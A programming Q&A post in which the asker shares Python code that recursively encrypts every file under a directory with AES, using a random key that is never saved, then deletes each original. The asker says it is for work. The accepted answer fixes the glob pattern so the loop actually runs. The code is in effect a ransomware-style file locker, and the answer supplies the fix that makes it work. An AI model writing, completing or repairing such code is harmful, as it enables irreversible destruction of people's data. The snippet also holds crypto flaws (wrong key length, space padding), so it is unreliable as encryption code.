# Recursive glob returns no file

Tags: python, python-3.x, encryption, glob

```
import glob
import os, random, struct
from Crypto.Cipher import AES

key = str(random.randint(10000000,999999999) * 42)
startPath = 'C:\\Users\\dev\\Desktop\\test'

def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
    """ Encrypts a file using AES (CBC mode) with the
        given key.
        key:
            The encryption key - a string that must be
            either 16, 24 or 32 bytes long. Longer keys
            are more secure.
        in_filename:
            Name of the input file
        out_filename:
            If None, '<in_filename>.enc' will be used.
        chunksize:
            Sets the size of the chunk which the function
            uses to read and encrypt the file. Larger chunk
            sizes can be faster for some files and machines.
            chunksize must be divisible by 16.
    """
    if not out_filename:
        out_filename = in_filename + '.enc'

    iv = os.urandom(16) 
    encryptor = AES.new(key ,AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)

            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - len(chunk) % 16)

                outfile.write(encryptor.encrypt(chunk))

#Encrypts all files recursively starting from startPath
for filename in glob.iglob(startPath, recursive=True):
    if(os.path.isfile(filename)):
        print('Encrypting> ' + filename)
        encrypt_file(key, filename)
        os.remove(filename)
```

When running this in Python 3.7 I get no errors but nothing happens, I'm using it for work to encrypt a sensitive user directory when the user logs out, all other parts of my program work. Could someone explain what's wrong with it?

Answer (score 1, accepted):

From [the doc for glob](https://docs.python.org/3/library/glob.html#glob.glob):

> If recursive is true, the pattern “**” will match any files and zero
>   or more directories and subdirectories. If the pattern is followed by
>   an os.sep, only directories and subdirectories match.

So, if you want to use `glob` here, you need to include this pattern:

```
for filename in glob.iglob(os.path.join(startPath, '**'), recursive=True):
     # ....
```

Comment: This line of code can not generate this error. Have another look at the traceback, and post another question if you can't solve it!